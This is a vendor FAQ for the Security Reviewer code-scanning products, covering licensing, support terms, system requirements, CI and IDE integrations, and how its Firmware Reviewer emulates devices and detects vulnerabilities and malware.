Security Reviewer Static Analysis and Software Composition Analysis license policies are for unlimited users, unlimited clients, unlimited servers, unlimited analyses and unlimited lines of code. Only you have to specify the IP range on which Security Reviewer will run. Buying unlimited licenses includes 1 year of support and maintenance. Additional support and maintenance years must be purchased separately. Special prices will be applied for 3 years or more of additional support and maintenance. A special bid for a limited scans (50, 100 per year) exists only for Static Analysis Desktop Edition. See: Code Inspection or Software Composition Analysis FAQ below.

No. Security Reviewer products are made of 100% software components

All Security Reviewer software components are made by Security Reviewer itself. Only updated and secured versions 3rd-party libraries are used. See: Open Source Licenses All support and maintenance tasks are provided by Security Reviewer and its Resellers network. No other vendors are involved

All Security Reviewer software are implemented in compliance of Secure Coding standard like OWASP, WASC and CWE. Each new version is Static Analyzed using Security Reviewer Static Analysis and open source and commercial tools like Fortify.

Our Support Team will understand your existing Continuous Integration environment, optimize Security Reviewer integration and make sure that you get maximum value from your investment. Support provides a 8x5 or 24x7 service, depending on your Support & Maintenance Contract. A Service Desk is included, via a web ticketing system, via e-mail or via telephone calls, depending on your contract. Maintenance service provides products updates and patching on monthly basis. Patching is done for bug-fixing with a response time from 3 to 48 hours depends on your Contract

We provide a basic Support contract of 8x5, and Gold or Premium of 24x7. Maintenance is always provided with a monthly release update. Patching (part of maintenance) is done for bug fixing with a response time of 8-48 hours for Basic Support and 3-8 hours (3 hours for High, 5 hours for Medium, 6 hours for Normal and 8 hours for Low priority) for Premium support. For further SLA details, please ask to your preferred Reseller

See Languages

Many virtualization platforms are supported in different ways, depending on Editions (see Code Inspection FAQ below):

• Virtual Desktop Edition is used via SaaS via online VDI platform, based on VM

• Server Edition can have a WCF Service running in a VM

• REST API Edition as SaaS based on VM

• Developer Edition can run scan task remotely in a VM

Desktop Edition cannot run on a local VM

See Compliance Modules

We guarantee the deployment of your Change Requests in about 48 hours and your Feature Requests developed during next 30 working days. We are committed to help our clients reaching their goals, to personalize their Secure Review experience, to provide an innovative environment, and to make the difference. Once you are a Customer of ours, feel free to ask what you need and you will get it for free! Your enhancement request will be inserted in the product roadmap and delivered to you soon!

The best way to submit an enhancement request for your Security Reviewer product is to go to https://www.securityreviewer.net/support. Select the product in which you are interested and the related section. Otherwise you can send you request via email to info@securityreviewer.com

The benefit of posting your suggestion on the Support site is that you “own” it. You will be notified by email of all replies and you will be the “thought leader” for the idea. Other users can see that the enhancement request is your idea, and you can lead the conversation in a way that will make your request compelling to Security Reviewer. Other users can “vote” on your idea and you can “campaign” for votes for your idea. Other users may also suggest a workaround or another way that you can accomplish your objective.

Security Reviewer’s Product Management reviews the submitted requests regularly, and you should see a reply within two o three days.

For all the reasons above, posting and socializing your request on the Support site is the most productive and informative place to open an enhancement request.

We confirm that no additional costs are required for new available features during your support contract. New features may involve:

• New supported OS

• New supported languages

• Enhanced products' features

We do not offer Consultancy Services directly to Customers. Beware of false Security Reviewer 'experts'. To ensure Project success, we offer a Certification Program mandatory for every Consultancy Firm using our Products in a Consultancy Project at Customer's site. See Our Certification Program

See Our Reseller Network

Further to our Continuous Integration (CI) (see related FAQ) and IDE Plugins, the following Editions are available:

• Desktop Edition. All features are provided by this Windows Desktop app, SQALE Dashboard and CLI Interface are Included. It is installed on premises and provides both Unlimited and Limited (50, 100, etc.) scans/year.

• Virtual Desktop Edition. All features are provided by this Remote Desktop app, running on Windows, Mac OSx and Linux. SQALE Viewer is Included.

• Developer Edition. Choose one of IDE plugins you want, and you can scan, view results and create reports directly inside your IDE. Windows only.

• Server Edition. Desktop Edition additional module. It shares configurations, False Positives, Exclusions, Results and even encrypted source code between Desktop Editions.

• REST API Edition. A Java CLI Interface run scans, check scan progress and download Results from a REST API on-premises Server

Desktop Edition

Windows

      Microsoft®Windows 10 Professional or Enterprise (Home version not supported), Windows 2008 R2 Server or newer (Windows 2012 R2, Windows 2016, Windows 2019 and Windows 2022 included). 

64 bit environment is suggested for better performances.

      .NET core 5 preinstalled with offline installer.

      Oracle JDK 1.8 or Oralce 11 preinstalled. For further details, please refer to the related chapter below

      At least 4 GB RAM or minimum RAM required by Host System

      2 Cores

      A physical hard disk greater than 200GB

      1 GB of free C: disk space during running

Linux

       Centos Linux 7.x or 8.x; or newer, Ubuntu 16.04 or higher, Debian 9 or higher, Oracle Linux 7.x or 8.x, Fedora 21 or higher, RedHat 7.x or 8.x

      64bit environment is mandatory

      Oracle JDK 1.8 preinstalled. It won’t run with OpenJDK

      Python 3.6 or higher

      At least 4 GB RAM or minimum RAM required by Host System

      2 Cores

      A physical hard disk greater than 200GB

      1 GB of free C: disk space during running

macOS

       64-bit 10.x Sierra or newer

.NET core 5 preinstalled with offline installer.

      Oracle JDK 1.8 or Oralce 11 preinstalled. For further details, please refer to the related chapter below

      At least 4 GB RAM or minimum RAM required by Host System

      2 Cores

      A physical hard disk greater than 200GB

      1 GB of free C: disk space during running

Virtual Desktop Edition

Host System: Microsoft®Windows , Mac OSX or Linux. No particular configuration is suggested. The application runs in a remote Windows Server. If you need that Server on your premises, it needs the same configuration of Server Edition

Developer Edition

Same configuration of Desktop Edition, with one of IDE Plugins installed.

Server Edition

Windows: Windows 2008 Server or newer (Windows 2012 R2, Windows 2016 and Windows 2019 included). .NET Framework 4.8 redistributable preinstalled. IIS 7.5 or newer for WCF

Linux:

• Centos 7/8

• Ubuntu 16.04/18.04/19.04/19.10/20.04 both server and desktop

• Debian 9 or higher

• Fedora 21 or newer

• Oracle Linux 7.x or 8.x

• SuSE Linux Enterprise 12 or newer

• RedHat RHEL 7.x or 8.x

Mac:

• macOS 10.x Sierra or newer

JDK 1.8 or JDK 11 preinstalled.

Minimum RAM required by Host System.

REST API Edition

Same configuration of Server Edition with additional Apache Tomcat 9 installed.

See Infrastructure

See Infrastructure

Static Analysis does not need RBDMS to run, and it is fully extensible via XML.

No. Static Analysis does not require Internet access. Remediation Tip, Reference documentation and Standards have links that can be disabled in configuration, often required by customers

See Agile & DevOps Security

See Our Independent Advisors Network

When a Security Vulnerability is detected, a number of detailed Attributes is provided.

See this video:

Legend:

Q. Can Static Analysis provide per-component results?

Before executing the Static Analysis, source code may be grouped by Components, via Component Builder feature. Results by Component, Outsourcer and/or Development Team can be associated, as well as the related Application Portfolio ID and Project Initiative

Q. When Analysis ends, is there a notification service?

At Analysis termination, an e-mail can be sent to a single target address and/or a mail group using your own SMTP server. Notifications can be also made using Slack, Microsoft Teams or sent to any Platform with WebHooks support. See Ecosystem for further details.

Q. Which Analysis results output formats are supported?

Results are exported in customizable PDF, Word, Excel, HTML, CSV, JSON and XML formats. Reports can be customized with ISO 9001 cover page, your logo, Classification and your Responsibility Chain.

Q. May I suppress a vulnerability?

Yes, you can mark a vulnerability as False Positive, insert Notes and Vulnerability Status, all associated to a specific author. Those information will used in the next Analysis and included in the reports. See False Positives and False Negatives

Q. In Static Analysis, may I create custom Security Rules?

You can exclude some Security Rules from the Static Analysis, between the ones available, or you can create new Security Rules using the Digital Secure Assist standard. Those rules can be associated to a specific analysis or to a single Application or Group of applications

Q. Which Development IDE are supported?

Currently, Eclipse, NetBeans, Visual Studio, Visual Studio Code, IBM Rational Team Concert, Rational Software Architect, Rational RAD Studio, JetBrains IntelliJ IDEA, RubyMine, WebStorm, PhpStorm, PyCharm, AppCode and Android Studio plugins are available. See IDE Plugins

Our CI plugins rely on Jenkins and Bamboo infrastructure to run. Do not require additional resources.

Our CI plugins rely on Jenkins and Bamboo infrastructure to run. If you need to improve users, clients or servers number, you must change your own infrastructure, it does not affect the CI plugins configuration and there are no additional costs

When a product is purchased, for each product the following manuals are provided: Solution Overview, Installation Manual (includes Troubleshooting), User’s Manual (includes Release Updates and Patching procedures as well as OWASP Dependency Track user’s guide), IDE plugin manual, REST API interface manual, SonarQube Plugin manual, ThreadFix Integration manual, CLI Interface manual. Such manuals will be updated together when a new Release will be available

Virtualization does not affect the CI plugins configuration and there are no additional costs. Our CI plugins rely on Jenkins and Bamboo Infrastructure to run. Anyway, our solutions has been tested on VMware vSphere/ESXi, Oracle VirtualBox, Microsoft Hypervisor, Red Hat Enterprise Virtualization and KVM virtual machines

Please refer to Infrastructure page for further information

Please refer to Infrastructure page for further information

Our solutions do not need RBDMS to run, they are fully extensible via XML. Only Software Composition Analysis uses for temporary storage an unmodified binary redistribution of H2 database engine (http://www.h2database.com/). It needs neither support nor Backup

No Backup or Restore of Configurations or Data are required, due to our products are standard CI Plugins. Data is stored in your Software Configuration Platform (i.e. GIT, SVN, CSV, TFS, etc.), and configurations are inside your CI platform. Please refer to your internal Jenkins or Bamboo operation procedures.

Unique Data used by our CI Plugins is about External Sources used in Software Composition Analysis. Such Data will be stored temporary in an H2 database and refreshed automatically. No need of backup or maintenance

Installation is made in two phases:

• Core product installation

• CI Plugin Installation.

Core Product installation is about Static Analysis or Software Composition Analysis products and consists of copying and unzipping a few files to a specific folder. CI Plugins can be installed directly from Jenkins or Bamboo using their plugin manager or by CLI Interface or plugin download feature. See:

• Jenkins Plugins web service and Jenkins Managing Plugins

• Bamboo Installing a Plugin

CI Plugins cannot run without a previous Core product installation.

Everything will be installed on-premises and can installed in unattended mode using CLI Interface

Only Software Composition Analysis CI Plugin requires access to Internet, for accessing to External Sources. An internal Proxy Server belonging to your organization can be used. It must be configured inside your CI Platform:

• Jenkins behind a Proxy

• Bamboo Proxying

No additional costs are required for new available features during your support contract. New features may involve:

• New supported OS

• New supported languages

• Enhanced products' features

Our CI Plugins support Logging. See available Logging options

Our CI Plugins rely on your CI Platform Infrastructure. It has been tested with Docker, Kubernetes, OpenShift and with a number of APPC-compliant container platforms. No special Dockerfile is needed

Our CI Plugin can run in Multi-tenancy mode, depending on your CI Platform configuration. See: https://www.cloudbees.com/blog/multi-tenancy-jenkins and https://community.atlassian.com/t5/Data-Center-questions/Multi-Tenancy-within-the-product-or-different-instances/qaq-p/582750

Software Composition Analysis (SCA) CI Plugin supports various Package Managers. See Package Managers.

For both Static Analysis and Software Composition Analysis Ant, Maven, Gradle plugins are available.

See Agile & DevOps Security

See Our Independent Advisors Network

When a Security Vulnerability is detected, a number of details are provided.

Static Analysis provides:

• Vulnerable File Name

• Vulnerable class / method / function or perform (for COBOL)

• Vulnerability Map

• OWASP Top 10 classification

• CWE ID

• WASC ID

• CVSS v3 classification (base score and vectors)

• CVE/CPE

• Severity (Blocker, Critical, Major, Minor, Info)

• Vulnerability Category

• Vulnerability Description (includes external documentation and known attack vectors links)

• Remediation Tip

Software Composition Analysis provides:

• Vulnerable Library / Framework / File Name

• CPE Vulnerability ID

• Package

• Highest Severity, CVE Count, Evidence Count (Vulnerabilities can be many)

• OWASP Top 10 classification (usually A9-Avoid using components with known vulnerabilities)

• Vulnerability Description

• License type

• Evidence (Type, Source, Name, Value, Confidence)

• Related Dependencies

• Published Vulnerabilities. For each vulnerability: CVE/NPM ID, Description (Remediation included), Severity, CWE ID, CVSS v2 and v3 classification (base score and vectors), References, Vulnerable Software and Versions.

When a Vulnerable library/framework is detected, the Vulnerability Description suggests the minimum next non-vulnerable version. If the vulnerability involves a certain library function only, and the analyzed application does not use such vulnerable function, the related Severity will changed to lower

Your Library/Framework can be clean today, but vulnerable tomorrow. For continuously monitoring, we provide a Maven Plugin for Sonatype Nexus Repository and JFrog Artifactory systems. The Maven plugin can be executed inside your CI Platform as a build task and, further than against a repository, a folder in a Network File System can be periodically analyzed using the same plugin

Yes. We analyze both System Libraries and Libraries/Frameworks used in applications. See Containers Security for further details

Yes. A vulnerable Library/Framework can be blacklisted, and notified to Sonatype Nexus Repository and JFrog Artifactory systems, for avoid putting it in production

Yes. We support Jenkins and Bamboo pipelines natively. For other CI Platforms, our CLI Interface is multi-thread and pipelines-ready by design. See Infrastructure for a list of tested CI Platforms

Yes. We use the Jenkins / Bamboo embedded GUI in our plugin, providing all scan and configuration features, like:

Build Task (both Static and SCA task)

– Path to scan

– Output directory

– Generate Report: HTML, XML, JSON, CSV, PDF, Word

Static Analysis Build Task

– Project Name

– Version

– Exclusion List

-. Incremental Analysis

– Programming Language

SQL Dialects: PL/SQL, T/SQL, U-SQL, Teradata SQL, SAS-SQL, IBM Datastage, ANSI SQL, IBM DB2, IBM Informix, SAP Sybase, Micro Focus Vertica, MySQL, FireBird, PostGreSQL, SQLite, MongoDB, Hibernate Query Language, Hadoop PL, HiveQL.

NoSQL. MongoDB, CouchDB, Azure Cosmos DB, basho, CouchBase, Scalaris, Neo4j, InfiniSpan, Hazelcast, Apache Hbase, Dynomite, Hypertable, cloudata, HPCC, Stratosphere, Amazon DynamoDB, Oracle NoSQL, Datastax, ElasticDB, OrientDB, MarkLogic, RaptorDB, Microsoft HDInsight, Intersystems, RedHat JBoss DataGrid, IBM Netezza, InfiniDB, BigMemory, GemFire., Accumulo GigaSpaces, SAP Hana, Couldera, memBase, simpleDB, redis, cassandra.

Mobile DB. SQLite, eXtremeDB, FireBase, Cognito, Core Data, Couchbase Mobile, Perst, UnQlite, LevelDB, BerkeleyDB, Realm Mobile, ForestDB, Interbase, Snappy, SQLAnywhere.

– Load Type: Folder, Project, Component

– Target Browser version of Chrome, Firefox, Opera, IE, Edge, Safari

– Auditor

– Scan Options: Trusted Functions/Queries/Env/Socket/Servlet/WS/REST, Source Lines to be reported, Max Vulns per line, Max Issues

Manage Jenkins->Configure System, Bamboo Configure Task

– Temporary directory

– Global Data Directory

– Data mirroring scheme: CPE/CVE/Retire.js/All

– CVE 1.2/2.0 base/modified URL

– Enable analyzer: JAR, archive, assembly (DLL/EXE), Maven Central, NuSpec, Nexus, JFrog, Autoconf, CMake, PHP Composer, Node Package, Node (NPM) Audit, Retire.js, MSBuild, NuGet, OpenSSL, Python distribution/package, Ruby Bundler Audit, RubyGem, CocoaPods, Rust Cargo, Swift Package Manager, SNYK

– Nexus Services URL

– JFrog Artifactory URL, API Token, API user, Bearer Token

– e-mail Notification: STMP Server, Default user e-mail suffix, Use SSL, SMTP Port, Account Details, Content Type

– webHook Notification: Request parameter, Token header, Authorization header of type Bearer

Our CI Plugin rely on your CI Platform Infrastructure. It is up to you installing separate CI environments at your site, with no additional costs

Before executing the Static Analysis, source code may be grouped by Components, via Component Builder feature. Results will be provided by Component, an Outsourcer and/or a Development Team can be associated, as well as the related Application Portfolio ID and Project Initiative

At Analysis termination, an e-mail can be sent to a single target address and/or a mail group using your own SMTP server. Notifications can be also made using Slack, Microsoft Teams or sent to any Platform with WebHooks support. See Ecosystem for further details.

Results are exported in customizable PDF, Word, Excel, HTML, CSV, JSON and XML formats. Reports can be customized with ISO 9001 cover page, your logo, Classification and your Responsibility Chain.

Yes, you can mark a vulnerability as False Positive, insert Notes and Vulnerability Status, all associated to a specific author. Those information will used in the next Analysis and included in the reports

Web Interface is used in two different ways: from within your CI Platform web interface you can launch the Analysis, View the results, Suppress False Positives, Export the results. From within OWASP Dependency Track portal you can launch a Software Composition Analysis, View the Static Analysis and Software Composition Analysis results, Suppress False Positives, Export the results

You can exclude some Security Rules from the Static Analysis, between the ones available and you can create new Security Rules using the Digital Secure Assist standard. Those rules can be associated to a specific analysis or to a single Application or Group of applications

Currently, Eclipse, NetBeans, Visual Studio, Visual Studio Code, IBM Rational Team Concert, Rational Software Architect, Rational RAD Studio, JetBrains IntelliJ IDEA, RubyMine, WebStorm, PhpStorm, PyCharm, AppCode and Android Studio plugins are available. See IDE Plugins

Our CI Plugins are native for Jenkins (CloudBees ready) and Atlassian Bamboo CI/CD. Other CI Platforms are supported via CLI and REST API Interfaces. At customer’s site we currently tested:

• Azure DevOps

• Concourse-CI

• AppVeyor

• Travis CI

• Circle CI

• TeamCity

• CodEnvy

• Chef

• AnthillPro

• GoCD

Our CI Plugins integrate with Issue Tracking in two different ways:

• via available plugins in your CI Platform (JIRA, BugZilla, GitHub Issues, etc.) . See Issue Tracking in https://plugins.jenkins.io/ and https://marketplace.atlassian.com

• via CLI Interface and REST API. See our EcoSystem

Yes, the SonarQube and ThreadFix integrations are natively supported. Other dashboard support is provided via OWASP Dependency Track. See Dashboards

REST API are provided in two ways:

• via your CI Platform REST API: you can launch Static Analysis or Software Composition Analysis, download results

• via OWASP Dependency Track: you can launch Software Composition Analysis, download results, managing users, groups, rules and roles

A CLI interface is provided, both for Static Analysis and Software Composition Analysis: you can launch the analysis in async mode, check the analysis status, download results, managing rules

Both REST API and CLI interface are well documented in related manuals

Web Interface, accessible via REST API too, is used in two different ways: from within your CI Platform web interface or by OWASP Dependency Track. Both solutions support:

• Integration with your AD/LDAP for Role profiling at User, Group, Projects, Teams and Application Level

• Role profiling for Administrator, for AD/LDAP and Local Users, Groups, Projects, Applications and Teams management (import, create, edit, delete)

• Role profiling for Configuring Analysis, Configuring Rules, Executing the Analysis or Browsing Analysis results (Remediation suggestions included), per Application basis

• Custom Role profiling for each single feature access (deny, read-only, etc.)

Our products can be monitored in different ways:

• via REST API

• via CLI Interface

• via Log Analysis

• via JMS messaging. Native for Jenkins JMS Messaging plugin and Bamboo JMS Template

Firmware Reviewer can be installed On Premise (setup or VMWare Virtual Machine) or in Cloud

See System Requirements.

Firmware Reviewer executes both Static and Dynamic Analysis. After extracting the bootloader and file system from the image, the Static Analysis consists on executing a Task List, which includes checking of OS, system libraries, 3rd-party libraries, executables and scripts against CVE and Exploit databases to find known vulnerabilities. Scripts source code is also submitted to Security Reviewer’s SAST module to verify OWASP, WASC and CWE vulnerabilities checks. It will reveal also Visible configuration, IPs, e-mails, URIs, Visible Services, Unwanted Programs, and Compliance Issues. Dynamic Analysis consists in Device Emulation and in applying attacker patterns to the firmware image. Dynamic Analysis execute also Hardening Compliance test and other tests like Malware Scanning, using an embedded version of Metaesploit against our own collection of rules. See Malware related question below.

Firmware Reviewer Emulate a device using an our own enhanced version of QEMU. For complex firmware it can execute a Partial emulation (bootloader and init system) and install a /wiki/spaces/KC/pages/1455980582 in the firmware bootloader, in order to manage encrypted firmware and gain access to login credentials. It will increase the Dynamic Analysis comprehensiveness and accuracy.

Firmware Reviewer provides a Plugin Developer’s Kit as well as /wiki/spaces/KC/pages/1406631937 interface. External tools are orchestrated within dedicated plugins, and, in case of external systems, through REST API. Results are automatically correlated in a unique report.

Firmware Reviewer makes use of Security Reviewer’s SAST native module to analyze source code found inside the firmware image: shell scripts, python, php, lua, javascript, etc. in order to verify OWASP, WASC and CWE vulnerabilities checks.

Firmware Reviewer detects exposed vulnerable standard library functions, like strcpy, sprintf, strcat, strncat, memcpy, memmove, gets, getw, system, etc, by analyzing all binaries existing in the firmware. They can expose it to Buffer Overflow, Heap Overflow and Stack Overflow, DoS. Command Injection and Integer Overflow vulnerabilities, as described by CISA CERT coding practices and CERT C Secure Coding Standard. They can included both in system components and application components. In case of system components it is suggested to update them to a non-vulnerable version, while in case of vulnerable application components it is suggested to use safe functions, like: strcpy_s, sprintf_s, etc. The vulnerabilities are classified using CVE and CVSS scoring.

You can execute Firmware analysis of the new version, and use Firmware Reviewer’s Compare feature to discover new or fixed vulnerabilities between the two versions.

Using our /wiki/spaces/KC/pages/1455980582, the users with empty or default passwords will be automatically monitored by Firmware Reviewer. At Emulation runtime, when a service is accessed using the real credentials, the /wiki/spaces/KC/pages/1455980582 will track it and will try to use such real credentials to login. Firmware Reviewer never access to physical devices, emulating them only.

Each vulnerability is classified using CVE, reporting the most important vulnerabilities with Exploits. Each Exploit provides a script for verifying if the firmware is exposed or not. Since Firmware Reviewer never access to physical devices, it is up to you executing tests on your own devices.

Malware is detected using an embedded version of Metaesploit against our own collection of rules, as well as through Dynamic analysis of ELF files:

1. Starting and Termination: Time Stamps and Elapsed Time.

2. Processes Information: clone, exec and exit etc.

3. File I/O: open, read, write and delete etc.

4. Network: TCP, UDP, HTTP and HTTPS etc.

5. Typical Malicious Actions: self deletion, modification and lock.

6. API Information: getpid, system, dup and other libc functions.

7. syscall sequences.

Further, our Dynamic Analysis finds Backdoors based in: Suspicious open TCP ports, suspicious connection to external IPs and URIs, presence of Non-standard services and Suspicious executables.